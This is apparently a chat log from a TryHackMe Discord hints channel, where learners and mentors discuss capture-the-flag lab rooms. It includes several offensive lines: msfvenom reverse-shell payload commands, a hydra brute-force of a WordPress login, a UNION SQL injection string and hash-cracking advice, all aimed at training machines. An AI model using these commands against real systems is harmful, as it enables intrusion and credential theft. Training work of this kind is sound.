#room-hints
What the payload currently
Sometimes you need to run it 2 3 times if it doesn't work
Nah, its default vbox ip which is eth0.
Oooo
it worked, but a shell didn't open, did i interpret this wrong cause now it says meterpreter instead of msf5
If it says meterpreter then you got shell.
ok cool
Type getuid.
Hey doing revenge now and i managed to drop the creds but couldnt get them to crack can anyone give a slight nudge?
I am stuck in task 2 question 6 of onepiece room. I got username but when i bruteforce using hydra for password. I got wrong password multiple time. Can anyone give me a small hint?
need a hint to solve crackme1 in Intro to x86-64 room
Anyone have a hint for revenge? Got flags 2 and 3, but I don’t understand how I skipped flag1. Lol
try enumerating the database again @thorny nest
when cracking a password i used hashcat right?
Use hashcat, john, crackstation or use whatever you like.
alright, thank you so much. im new to linux and ethical hacking and every bit of help is nice.
yea, im working on blue rn
ummm do you know where the hashcat directory is? im using kali linux
Don't use hashcat on a vm. If you want to know where hashcat is type locate hashcat. Also, you can execute hashcat from terminal by typing it.
wait why not use on vm?
In vm you don't have access to gpu so it'll depend on cpu which is slower than using gpu.
Hmm, use crackstation first if it can't crack it use hashcat or john whichever you prefer.
alright tyyy
Np.
agreed, on it rn and I think I'm getting close to a foothold
definitely doing one of those @oblique cliff 🙂
@proven bridge can i dm ?(plz)
@cedar coral I can’t help for a few more days!
hey hi team i have pwned, Jeff machine and got USER.txt , but not working in the panel
r u telling to me @stuck fractal
Yes
so what can u do
There's no help or hints for 72 hours after the challenge releases.
@median compass thanks! I got it now. Not sure why I missed that.
What are you stuck on @sick sun
Credentials for ||m|| and ||c||
What commands do you have?..
Only ||nc|| and ||id||
So you've already logged into the admin console?
@inland onyx Hmm no
Then how do you have nc and id?
@inland onyx Can i pm you ?
I am very confused rn, so yes
morning all! im trying to get the final flag on dogcat, ive extracted ||backup.tar|| and see a dockerfile. i assume i need to get into that docker environment but am having troubles, as docker is not in /bin. tried installing docker on the box since i have root, no surprise that it didnt work. could i get a small nudge? am i going in the right direction?
Top tip @rose cape
||You're already in the container||
oh poop thanks
That long, seemingly random host name is indicative of that -- as is the fact most of the commands are missing 😁
lmao i was about to comment on the choice for the hostname
Yep, randomly chosen at boot 😄
i honestly have no idea where to start on the Revenge room
ive checked through what I feel like is every crevice but I can't find any opportunities
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
@inland onyx are hints being given out yet?
Yeah, it's been almost a week
i dont got any idea about this machine i just got /admin .. and i make script brute force the admin panel .. without advantage
@supple bronze look at the hint after you try to use ||/admin||
so did you find usernames to test against and what did you use for your wordlist?
@near shoal i see but i dont sure about username ..
best hint I can give is don't overthink it
once you go from there you know what ||/admin|| tells you, you should be able to guess it or build a wordlist 😉
Hi... Any hint on "Year of the pig" ? i've been stuck since day 1 on the first flag.... i've done some /reading/research/scan/reverse(javascript)/bruteforce(json, cookie) and nothing ... i must be blind -_-. If i can mp someone and tell my story :p. any help would be really appreciate thx
@zinc dome where are you stuck? did you manage to log in?
pip install requests or pip3 install requests
run it under python2, also try running python -m pip install requests
pip is aliased to pip3 for your system
@livid vault
And use screenshots please 🙂
okeokey sir
@sour vapor i'm stuck on login form...
so you looking for a password right?
before a password, i must be sure of username
well username is kind of obvious, just go to the site
for "Year of the pig" admin login, do I need to find and build a small word list to crack it?
common word list is too slow considering the rule hint.
i am stuck in Task21
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
i am stuck in Task21

shiba2@nootnoot:~$ ./shiba2
cat: /etc/shiba/shiba3: Permission denied
- I am in room "Year of the pig".
- I stuck at admin login page, enumerating the password.
- I tried SQLi on username or (hashed) password, not work. I tried to enumerate the password using a wordlist, applying the rule given as hint after failed login, but common wordlists (50000+ entries) are too slow for this case.
Can I get a hint?
i am stuck in Task21
@elder glade Please do not ignore the mentors if they ask for more information. It's a really good way to just be ignored in the help chats. It's also really disrespectful to them, given they're all volunteers giving up their time to help people
@wicked rain Don't use a common wordlist
Hi, I'm new here. Stuck on the Learn Linux - Task 11. I've created what it asks for but unsure where to find the binary to run, it says simple challenge so perhaps I'm just overthinking it...
Did you SSH into the machine?
The binary is right there in your home directory, you can see it with ls
Everything needs to be done in that machine
Thanks.
Terminate and redeploy the machine.
@stuck fractal Thanks a lot !! will do the same.
oky 😦
@white salmon you can DM for smol hint if you want
@inland onyx I am new to discord. I was trying to fetch the error details from the apps.
uwu, I think i need a hint on room "year of the pig' login
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
opps sorry.
- Room of the pig. 2. Enumerating. 3. nmap, and looked at the source code for bizarre js code.
hey hi , can anyone help me in Blog machine , i have done it in metasploit , i need to do it in manual way
hi guys, sorry, I'm doing this room : ctfcollectionvol1 and i'm in task 12,
the hint says reddit, i read and look around but found nothing, any advice?
Please only ask in one channel
is there someone doing the misguidedghosts room?
okay no problem didnt know😅
@sudden zephyr you can dm for a hint if you want
may i also dm for a little hinty @oblique cliff?
Ofc you may dm for a hinty
@oblique cliff may I get one wittle hinty too? 😄
only if you call it a wittle hinty
Good now? xD @oblique cliff
spent a while trying to figure out why a sha512crypt password wasnt getting loaded into a file doing echo $6$... > pw.txt
stupid dollar signs
Single quotes, or a text editor
nah when i echoed out the $, shell thought i was doing env variables from what I can tell
oh i see what you are saying
yea i ended up using an editor
@flint lintel That's exactly what happens
it took me a while lol
yeah i figured out what you were saying right after I typed that 😄
I am looking for a nudge for The Marketplace (newly released) if anyone has already looked into it
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
@lime verge As that's a brand new challenge room, please wait for 72 hours from room release.
Oh ok. Sorry for not reading more in depth the rules
@stuck fractal That was the key -f exe-service
Hello i need help downloading a tool called Printspoofer. The problem is i can not find the .exe file of it anyone thoughts?
TheMayor has a precompiled version hosted on his github https://github.com/dievus/printspoofer
Thx you very much, i got it 🙂
Are there any issues with some rooms? I cannot ping or see the Alfred room
Gotcha, I will ensure to run nmap with -Pn then
Anyone have a pointer for https://tryhackme.com/room/steelmountain ?
Task 3
Question 4: What is the root flag?
I've tried using the msfvenom reverse TCP shell and a few ports, I'm able to get the listener to receive some signal from the remote host; but never been able to pop a shell. I've tried both Powershell and normal Shell getting the same result
using: msfvenom -p windows/shell/reverse_tcp LHOST=SuperawesomeIP LPORT=4443 -e x86/shikata_ga_nai -f exe -o boopus.exe
I am also stopping said service prior to uploading said file
Make sure your listener has the exact same payload set
I'm not sure I understand, is there something that I have to specify with my listener?
The payload option
You need to set it to exactly the same thing as what you generated
I cannot overstate the importance.
hey hi , can anyone help me in Blog machine , i have done it in metasploit , i need to do it in manual way https://tryhackme.com/room/blog
Have you looked for an exploit?
You know what the vuln is so I'm sure you can find a script or instructions for it with research.
no i have logged in
but i have no ideas for getting shell
thanks got it , i am an idiot
Hello guys I'm on the Library room, and I'm a bit stuck 😦 someone have a hint for me plz ?
hi all, i'm patiently waiting for some hints on YoTP, way out of my league probably but....
i'm trying to brute force the password credentials using python
the md5 generated by my script matches the md5 generated by the website request
i've also set my user_agent details to match my chrome session
i'm using a wordlist generated from words on the website, and then tacking on 2 numbers and every special character
case matters btw
you're on the right track and if you're using a wordlist derived off the site then you're going to hit the password eventually
i ran with title case, i'll rerun lower case....
kk, btw I preprocessed my passwords so to use them w/ faster brute forcers
this is probably a dumb question but I gotta make sure, you're stripping input right? python, when reading from a file via for loop will include the trailing newline character
i did it just with likely 'memorable' words typing into a list
will query the page and strip it into a proper word list now
was already stoked to see python cycling 500 requests at a time, was hoping it was an obvious 1-5 key words
i figured i might get lucky because already just 7 key words is 18000 combinations when you tack on the # & special chars
take 120 secs at 500 threads
7 key words, wait you mean 7 characters or 7 words?
Milan Piccolo Savoia
no, you're really close rn
still no luck grrrrr
does the T-120s imply it should take less than 120 seconds to run?
i'm happy to post my code if anyone would take a look
just don't want to put a spoiler
trying to find the message, but yeah T-120 means that it should take < 120s
any hints for tyler machine koth ??
Hi there,
I'm stuck in the room "Revenge". I used nmap /gobuster / dirsearch but nothing interesting (/login & admin found). Any tips ?
@white salmon 1. It still belongs in KOTH channel #koth
- Check pins
ok
@sour vapor much obliged for the gentle hints without giving it away, off to debug why i can't write a proper Python script now 😄
🤦
my print success statement was nested in the function
it was working the entire time, but the success was hidden amongst the 21k returns
*to be a bit more accurate: concurrent.futures.ThreadPoolExecutor apparently doesn't catch exceptions in rookie code
so if you try to be a rockstar, make sure you don't make rookie mistakes in your code
hallo have only base question
@white salmon ok go ahead!
hey, need help on https://tryhackme.com/room/networkservices, Task 7, #10, someone know how to copy a reverse shell on a telnet session ?
ye but, as u can see in the screenshot, it get removed and i don't know why
when i go into my /tmp/ i can't found the "elberg"
rm /tmp/elberg
maybe i misunderstand something
You are.
The payload there is the string of text.
It's a set of commands for a reverse shell. The text is your payload.
nvm i found thx so much
@rough totem that's a brand new room
Please wait 72 hours from release before asking for help or hints
I have deleted your message as it contained spoilers.
Guys I need a bit of a shove with Theseus's initial foothold. I could crack the cypher and have an idea about the key thing
Suit has asked that no one provides help or hints with it
Anyone tried The Market
Think they want a hint on the new room The Marketplace
Yes @astral smelt
Please wait 72 hours from release before asking for help or hints
Okay
@stuck fractal Ok, I apologize if i spoiled anyone
Can anyone help me with revenge?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Got the flag 🙂
Im on misguided ghosts still enumerating
um and i dont know how to say it without spoiling it for someone but im at site that has console and requires pin so yes i tried many exploits but nothing lol
I'm on the Web Scanning room on Task 3 and I found #8 through research on google but i can't find the answer from ZAP
What's the question?
"Featured in various rooms on TryHackMe, Cross-Site Scripting is a vicious attack that is becoming ever more common on the open web. What Alert does ZAP produce to let us know that this site is vulnerable to XSS? Note, there are often a couple warnings produced for this, look for one more so directly related to the web client."
How would i get it to show up
You don't.
then how would i have found the answer
By waiting for the room to be updated.
Please don't post answers.
will do, so it's just the room that's old and not updated with the new update for ZAP
The alert was deprecated. You can read up on why.
any hints for The Marketplace room i understand the part of report page and after login page comes tried brute forcing and sql injection . any nudge in that direction
?
New Room, No hints for 72 hours :)
oh i have to wait 
I don't have linux, so I installed nmap on my mac using homebrew. I am doing an nmap scan sudo nmap -sS <ip> Well it's just showing the ip's but not the ports. I am on the fourth room about nmap. Any hints or help please?
which room
this one^^
did you deploy the machine
yep
are you connected to the vpn
yes
try again please
now its showing 3
but the answer's 2
okay
but why is it like that?
Am I supposed to ignore something?
Sorry I am new
it's ports under a 1000
oh yes
thank you
Exploiting, can someone help me on how to get a shell using reflected XSS.
What room
Marketplace
When I did that room the other day I had to look up a writeup on it because the output never gave me the correct version. 😕
So is this room outdated?
wdym? I booted it up and I got the right answer
I am getting 7.2p2
weird, could you share the ip?
Right, that was the answer I was getting.
??
10.10.222.216
here's the command:
in case
I'm fairly certain that's the wrong machine, there's a flag at the port 80 yet there's no flag input anywhere to be found on the room's page
wdym?
There isn't supposed to be one, infact it's actually supposed to be DVWA running instead
Try rebooting the machine because I don't think this is the right one?
So do I re-deploy the instance
Yeah
jinx
I googled the flag to check what box was actually deployed and apparently it's from Linux Challenges
Now it shows the right machine, thx
np
@proven bridge dm? plz
Hi all, I am stuck at CSP challenge 6 ... any nudge 🤓 ?
man
ah u mean me 😮 ?
nope i mean I am confused..mine nmap is not working properly for THM< boxes
oh ok, why u think that ?
Colourful!
check thisone i can scan a specific port with nmap But i am not able to scann all ports at a time using nmap for THM box
yeah i was frustrated...its several days now
am stuck here
You can't do -p- ?
yes
What happens
hey guy s , ihave stucked in || entering secret code , that is know 100% sure || in the https://tryhackme.com/room/lookingglass
no response when using -p- 1-65535
Personally I just do nmap -p- -T4 <ip>
Because then it just shows all open ports
then I do nmap -p[list_ports] -sV
I did this one too
What happens
am not able to scan all ports at a time using nmap
no crash...its like no scan only showing scanning in progress pls hold a sec i will send ss
no error
its taking longer and longer even no report getting
pls hold a sec i will send ss
Ok
Like this ....it will continue till i will not cancel the process
It’s just going slow. It’s going. You’re scanning 65000 things
@oblique cliff yes but why it is too slow....its like i have to wait for whole day
Which box is that on
hey guy s , ihave stucked in || entering secret code , that is know 100% sure || in the https://tryhackme.com/room/lookingglass
Did you deploy the correct machine? @lusty cipher
yes i did
@weary quarry my guy you already asked. I saw. No need to ask again. You do however need to be clearer with what you’re asking
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Try to terminate and redeploy? Or is this always happening for you?
i have no idea but this is going for few days...
like i am already trying from few days
!vpnscript
i did troubleshooting as well
Can you head over to tech support and be detailed with the problem?
sure pls
It's just slow 🤷♂️ You can't help it
It takes over up to 3 hours sometimes for me. Try using something like threader3000 or rustscan
@final mortar help him plz I want to sleep
Go Bob, 
hehey, I am stuck on a very simple last question in a lab. "How about the second common home private range?" Format is ... and the question before was 192.168.0.0 so the only possibility I think would be 172.16.0.0 but it is false. Other private range would be 10.0.0.0 but that doesnt fit the given form 😮
Given format for the question is ---.---.-.-
yeah
It’s another 192 address range
yep!
Just figured it out, I thought they were asking for a different class of a network and not a subnet 🙂 thx

Hey guys I couldnt find the answer for https://tryhackme.com/room/tmuxremux
Task6/11
How can you run the desired plugin after loading it?
In my opinion it depends on the plugin
I don't want to give too much away but I googled "tmux run a shell command" and went through the first search result ;)
Try that otherwise DM me
Any help with CCT2019 task1 ? I got the packets, did the crypto, reversed the binary but no clue where to get the flag.
Hi @eager flicker If you have the bin, start analysing it, you will find how to continue if you analyse it
hi all, any hints for "Content Security Policy" task #6 🤓 👀
@white salmon Figured that too but the room advises against re so I was thinking I'm doing something wrong.
@eager flicker ok got it after looking at the binary lol
Happy to hear that 😊
hi everyone! not sure if im on the right channel for this but anyways..im on https://tryhackme.com/room/rpmetasploit and when i run the exploit metasploit says the exploited is completed but no sessions was created what could be wrong?
- You're using msf6 which is broken
- You deselected the module or restarted MSF or something.
There should really be somewhat of a guide on installing msf5 from the source code. It was actually quite difficult to make it work
Why? Kali ships with it
Parrot doesn't, even though rapid7 asked them not to ship msf6
I installed a kali 2020.2 i think and it had msf6
Feel free to write a guide and post it in #resources
so it would be better for me to use Kali VM for THM?
Seeing as parrot shipped broken metasploit, yes.
2020 has msf6 also?
okok just asked because midwars said so
anyway thanks for the fast reply
ill try it that way
Probably it came with msf5 but I did have to upgrade some packages, might have updated msf as well in the process
!dark
Hey guys, I'm a little stuck on https://tryhackme.com/room/linuxctf flag 16; I have no idea how to find the system device that it's stored on, let alone mount it (that is what I'm supposed to do, right?)
A system device is usually mounted to a specific location
I got it, thank you!
Google Dorking Question 1, I feel dumb but I cant seem to hit it on the head. 🙂 TYIA
In which section?
Probably
Got it
steel_mountain: I'm trying to overwrite the service file, but it is in use so I cannot overwrite it with my malware... Any tips (stopping the service stops my session)
I just didn't know what is the correct channel for help... I wasn't impatient 🙂
Hmm, maybe changing the path is a good idea
That service shouldn’t have anything to do with your session
You should be able to stop it
Than it was coincidence... Try to change the path anyway 🙂
If you’re doing a path hijacking you’re not supposed to overwrite the file
the hint in the room told me to overwrite the service and restart it. (so no path hijacking I suppose)
I stopped the AdvancedSystemCareService (Is there a spoileralert policy in this room?)
Euh... How to do this next time || test spoiler||
@ember berry overwrite the service. Not the executable I believe?
ahh, nice
I don’t remember the task tbh you could be right
anyone can help with "The Marketplace" room ?
Please wait another... 22 hours?
why?
It is so everyone has a fair chance
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
ok no problem 🙂
Strange, The error with my connection crash was indeed a coincidence. But The service doesn't start. I've copied it, and now I try to start the service with Powershell, but I receive failure...
Can I use upload without specifying that it should be a binary upload?
(the msfconsole upload function)
You get a 1053?
what is that?
||ERROR: + start-service AdvancedSystemCareService9
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : OpenError: (System.ServiceProcess.ServiceController:ServiceController) [Start-Service],
ERROR: ServiceCommandException
ERROR: + FullyQualifiedErrorId : CouldNotStartService,Microsoft.PowerShell.Commands.StartServiceCommand
||
Try it with sc instead?
sc you mean secure copy?
Yep, so you can get around that by generating an exe-service format payload
I believe you can also get around it with staged payloads or something, but that's kind of hacky.
And that is something that should be uploaded to the target, or is that my waiting reverse shell?
ah, oke, I'll create a new exe, But now... I'm far past bed time... Hoped to finish this one
Thanks a lot!
-f exe works fine. I've tested this over and over again at this point.
@oblique cliff --> i am clever that it should leak with any spoiler
Spoiler tags
Are this allow to ask hint room marketplace ?
Not yet. Hints/help are allowed after 72 hours.
I cant find the SQL injection point for marketplace 😦
Please wait another 11 hours
ill keep trying
@wintry yarrow okay
Can someone give me a hint for CSP room flag 6?
am trying to do marketplace but can't get what the hint wants me to do
can anyone help ?
!rule 13
I tried. You cannot ask questions about the room for 72 hours after release
I think in 10 or less hours you can ask 🙂
that's quite nice of a deadline
8PM UK time
out of room i need a advice
This is the room hints channel
Most likely.
btw this site marketplace looks like a django site, can anyone confirm ?
Good afternoon. I have a little question, I'm at the beginner path, OWASP Juice Shop, doing the task 3, Inject the Juice; but somehow i've got Logged into the administrator account before, and now i'm trying to do the injection " ' or 1=1--" but how i've already done the challenge i can't get the flag. How to reset the page ScoreBoard. Or better how does it identifies me, since i've got connected from different IP through proxy and it still knows who am i.
that wasn't for hint just the url scheme looks like the same that's why i asked
@white salmon
you can reset the machine and clear ur browser cookies
i've done it :/ even change OS, browser, all... but it still the same ScoreBoard. Don't understand it hahha
i've used VPN, Proxy, Tor, changed MAC, so far is at my noob hands for "anonymity" and reset the ScoreBoard, but no way ... somehow it still know who am i.
None of those will work seeing as you're accessing it over the THM VPN
It's not spoiler , I have completed the 0day room , but don't know if it was the intended way , if somebody has completed that room can we please discuss the way you tried
@grim heron sure pm me
@stuck fractal
tried without the VPN, only through TOR browser and Macchanger, 0 cookies ... but it still recognizes me, don't know how... I bet i'm not prepared for that yet hahah
Literally won't help
You're not accessing it over the internet
You're accessing it over the THM VPN.
Anything to try and be anonymous on the internet won't touch it
No, im not in the THM virtual machine.... im accessing through my pc, through on the PC 🤔 reinstalled ubuntu, and not even have my VPN Profile here, and reinstalled mozilla.
You're still accessing it over the THM VPN
How is that ? :/
sorry man for my noobness, but how do i check it? :/
I'm very interested how you're attempting to access a private IP address without using the VPN
@white salmon Check what?
Im not connected in the OWSAP room.. :/ and have any machine open there ...
im entering here https://juice-shop.herokuapp.com/#/score-board
Then how are you attempting to complete the tasks for the room?
Use the VM in the room.
Been stuck at this stage for like an hour now and cant get it to work
any hints what could be wrong
forgot to mention I am trying to get the last answer for vulnversity
wasn't that but I eventually did find out the problem xd, thx for making me double check
@stuck fractal Thanks mate. I was trying to direct Burp the OWASP page from my PC ... Now i did it from the THM VM and it worked. I got a clean juice shop. So, the other i access is like a default one? Or how does it tracks my score if i changed all my config... it was supposed to got me a new one , not? 🤔
ok, so the scoreboard is by default. Man it was running me crazy 😆 . thanks, will keep studying
still struggling with last touches of cct2019. can't figure out crypto1c and cant get plaintext out of last decrypt of for1. Any hints?
Hey, is it possible to get any help with The Marketplace already?
Not yet.
@wintry yarrow can you please how much time i can ask about it?
I thinks it was on the hour just passed now. Should be fine now
mod can confirm?
45 mins then you can ask 8 UK time
No it's 7:15
I live in uk
@astral smelt dont be sorry best to make sure the rule isn't broken
great. so im at admin panel, trying ||SQLi on user param||. any hint?
I'm at the same bit
I spent too much time on it, could I have fallen into a rabbit hole?
There isn't much else to look at. Once you gain access you only have one extra page with what seems to be a very simple database.
I think about the ||JWT||, it has ||sqli|| attack methods.
@random osprey yes you need to || do an sqli on the user param. You need to use union select for it. Search for the table names first and then see what you learn from them ||
My question for Marketplace task 2 (privesc to root) : || I've reached the first user shell. I saw what sudo command I can run and LinEnum came back with a Docker version. I've looked a lot at the sudo command and there is no way for me to write to the script file and/or change it, making me think I need to exploit the Docker, but I have no idea how since I have 0 experience with sandbox environments. Any nudges on how to do this? ||
@lime verge normal URL decoding (ctrl+u) at burp is enough?
I did not even do it in Burp. Directly in the URL with the command
what about spaces?
Okay, so I am on the marketplace. ||I found out the table name and the different fields for it, just need a hint towards how to display a value of one of those fields (password field) in the sql statement. I honestly don't know much sql so kinda stuck at this point||
Maybe || UNION SELECT password || actually not tried it yet still researching
How big of a hint do you guys want for the SQLi part? I have a nice link that explains quite well what commands you can run in general
yes please.
A big hint would actually help at this point for me at least
I'm also stuck at the sqli part. I'm trying to use the substring mysql function but it doesn't seem to work. Am I on the right path?
|| https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/|| This helped me basically to do the hard part of it, finding the tables, then you can use the same principle for finding columns for certain tables and to get information out of it
Thanks.
Hey guys, I'm working on the Network Services room and I'm stuck on Task 4 Step 8.
I've never used SSH with a keyfile so I have a feeling I'm doing that part wrong.
Can you show us how you’re doing it?
I downloaded the id_rsa file from the remote host, ran chmod 600 on it, and put it in my .ssh directory.
no need to do the moving to .ssh
just check the ssh syntax 😉
it is ssh -"FLAG" key_file
If you move it to ~/.ssh then you don't need to use that flag
Even if I use -i I get the same thing
sure sure, but who want to mv all the time 😛
Connection closed by 10.10.249.161 port 22
what's the "message" ?
Generally that means wrong username
hmm
@stuck fractal You win. I'm a fool and made assumptions about the username.
Turns out that was wrong

I think it depends on the SSH configuration, because it doesn't always close the connection
Yeah that was odd. I expected a different error because if I tried root it asked for a password.
Thanks for the help
IIRC root has its own settings for SSH in the config
Slightly different out of the box
That would make sense then
@lime verge well, || what can you do with that script without altering it, and what would that gain you || or did you finish this already?
I just finished the room btw
@near shoal yeah. Took a while to figure it out but it was a smooth ride from then. One of the best machines I've done on THM
it's pretty neat yeh
For every step I've learned something new
some classics in it for sure, even if they were more well developed than usual with some depth. Really enjoying Jammy's rooms. His CSP room was lit too
@lime verge did you ||crack the bcrypt [Blowfish 32/64 X3] hashes?||
it's super slow
I think I'll jump in the CSP one next considering the quality
@random osprey don't bother cracking them
Hello, trying harder but no joy yet.. I'm in steel_mountain and trying to get the reverse shell. I see something connecting back, but it doesn't end in a shell.
msf5 > use multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.8.113.208:5555
[*] Sending stage (176195 bytes) to 10.10.103.82
this with the msfvenom command in the room notes (shikata_ga_nai)
I'm working on jeff's webserver.. after a VERY long process, I've finally got an ssh credential to a machine relevant to the room title.. I see a file user.txt. I see a flag that matches THM's flag structure (THM{flag}) ... (it wasn't easy, but I coaxed echo into helping) .. BUT this flag isn't working. Is there another step I am missing for the flag, or is it likely I am copying it wrong.. it's a pretty lengthy flag
Aren't you told to do something to the flag?
hMMMM.
The hint is not related to anything about the file, the hint points to a hosts
which was vital, for foothold, but that was so many steps ago
let me ponder this for a minute
I am researching hash types, i've tried a few obv ones, and it didn't seem to work
I'm on the MrRobot room and trying || to get the password for the WordPress site, I'm using the fsocity.dic wordlist, I've done a "sort -u" on it to remove duplicates and I'm now running that list with "hydra -l Elliot -P new 10.10.216.86 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^: The password you entered for the username" -t 30". This however seems to take longer than usual since when I searched on the topic they said that 15 min is too much.|| Any clues what I could be doing wrong?
Shriek: How does the cracking process work. It reads data in, does something, and continues .. It iterates yes?
@sour pivot try using wpscan. Much quicker
@fleet pike what's the most common hash type
@fleet pike [STATUS] 192.27 tries/min, 2884 tries in 00:15h, 8568 to do in 00:45h, 30 active
That was the latest^^
Can anybody help me with using msfvenom with a reverse shell? I'm missing something obvious I'm afraid
@oblique cliff I'll give it a try, thanks!
@ember berry can you show us what you’ve done?
I created the exec: msfvenom -p windows/shell_reverse_tcp LHOST=10.8.113.208 LPORT=5555 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
@fleet pike try the most obvious.
then uploaded it , and in a different msfconsole started the listener
Generate an exe-service payload, it works better here because otherwise windows kills it @ember berry
I tried that but it gave same result
@stuck fractal
Then try unstaged
how?
Wait
The listener was set to staged
The payload was unstaged
There's ya problem
Set them both to the same
Hmm, I looked a long time how to set up the listener... 😦
Blobberfree: i've tried *256 *512 *1sum and *5sum .. obv 512 is the wrong hash length. but 256 and *1sum, *5sum appear to be "in the zone" but i havent done an exact count on the answer mask . (i dont want to rely on this as a crutch just yet) ...i also tried all caps THM{HASHUPPER} (per the data in user.txt) and no caps THM{hashalllower} and thm{hashalllower} (for thoroughness) .. so i do not think im doing this correctly ..
Md
I have to re-read your wise words... I don't fully understand the different reverse shells, but this nailed it!
Md works, just don't add extra lines
Throwback is good for it #notAnAd @ember berry
@stuck fractal owing to the awesome environment its being run in, i'm copying only the string from beginning T in THM to end } .. no whitespace and running the hash on another term. do i have to use the local systems hash algorithm?
can someone please verify if i got the syntax right for this
grep -r "flag" /etc/update-motd.d/
i am looking for the text "flag" inside all the files inside the directory
or trying to search inside all the files located in the directory
@fleet pike The algorithm is the same everywhere.
Then i must be giving it the wrong input... groovy, this helps
cyrax0101: Your grep appears to coincide with your intention
@fleet pike make sure you're not adding an additional newline
Maybe try without adding one at all
Or try with just one
No hard returns. i'll try adding one
@lusty shoal I think its grep -r /etc/update-motd-d/ "flag"
grep (string) (target) target can be file, directory, or stream
@fleet pike thanks u are correct
i was meant to search for "Flag" instead of "flag" hence wasn't getting anything
James: I'll be damned. its a diff value
I went to delete it, and you beat me to it
Waterfall effect
hint to priv esc on marketplace?
Hey guys for marketplace || performing the sqli injection. I have found all three tables I'm now trying to enumerate the column names is this the right syntax
-1+UNION+SELECT+1,table_name,3,4+from+information_schema.columns+where+table_schema=database()+and+table_name='items'+limit+0,1 then 1,1 and so forth for each table name. Also I have to regain the cookie every time I put a wrong injection, very frustrating ||
So what’s your question / what do you need help with
Never mind I just can’t read geez
It's ok got it
The attackbox is being fixed, the metasploit db is broken rn
oh ok
But you can kinda skip the database parts
that explains... well.. everything! lol
They're not really a part of the msf room
so i should be good to start on task 3 commands?
or should i come back to metasploit later
I don't know what task everything is in, just skip db_nmap etc
👍 thanks
Is it allowed at this time to ask about the Marketplace room?
I found some || bcrypt password but the password || is not complete
@sick sun Why ask if you're allowed to ask, if you're not going to wait for an answer?
Check for yourself. 72 hours from room release. The messages are in #announcements
@sick sun we are past the 72hours
If it's more than like 5 minutes with rockyou, you're doing it wrong
It's a platform rule.
Brute force will take less than 5 minutes.
Usually it takes a couple secs with rockyou..5700xt.
This is bcrypt.
The platform rule still stands. 5 minutes for any brute force.
If it takes longer, then you're not meant to brute force it.
Is the "bonus challenge - the true ending" something im allowed to ask for a hint on?
@stuck fractal on what cpu?
@wild pier look for files that are out of place
Usually user files are in their home directory
Shouldn't really matter. 5 minutes on the THM Attack box is the new guidance. It definitely shouldn't be hours. @cedar axle
thanks @oblique cliff I found that one but haven't figured out its quirk yet... I'll keep digging thanks
I usually work on, if it's not in rockyou it's not brute forceable
Try short lists like fast track first
on my gpu rockyou takes a few seconds most of the time
Depends on the algorithm, bcrypt will be slow.
@oblique cliff its either the hidden one or the not hidden one but im not sure what either of them mean. the hidden one could be taken literally which i've tried I believe, and the non hidden one doesn't make a ton of sense if its a hint
assuming I'm even in the right directory lol
@stuck fractal true
what about python
can it be used for hacking
I am learning this but I was told that it could only be used for web designing
Python is useful in many ways in InfoSec
ok
Python only used in web design
What about machine learning
@random osprey || wildcard injection ||
@sick sun if you wasted too much time on them it means they are not useful.
@all any hints for Content Security Policy room?
Task 7 CSP Sandbox ? I am happy to discuss what I tried in DMs
in marketplace, is bruteforcing hashes a rabbit hole or right path?
rabbit
hey guys I'm having a go at marketplace and have got to the ||sqli part and managed to enumerate all the table names and in particular the users table and have a lot of hashes, have tried to crack with hashcat and rockyou but no luck, is there something I'm missing/could someone steer me in the right direction?||
@upper whale pm
can someone give me a nudge on the marketplace box? I was able to get administrator access, but when I try to run sqlmap on the || ip/admin?user=3 || nothing comes up, and I'm sure it's vulnerable to ||sqli||
@sinful plaza maybe look at the room tags 🙂
Okay, so I'm on the marketplace || I have the bcrypt password hash, anyone able to give me a hint on what to do with it because using hashcat on it does not look like it is going to work ||
@trim haven ok noted
hello there, regarding the 0day room, || I already cracked the encrypted private key found in /backup but I can't seem to find any username related to it, really. I tried gobusting the /secret/ dir but nothing comes up, except index.html || suggestions?
nevermind, just ran nikto ❤️
Hi all, can someone give me a vague pointer as to task 3 on The Marketplace? I'm struggling to elevate to root. Is it related to the ||backup script||
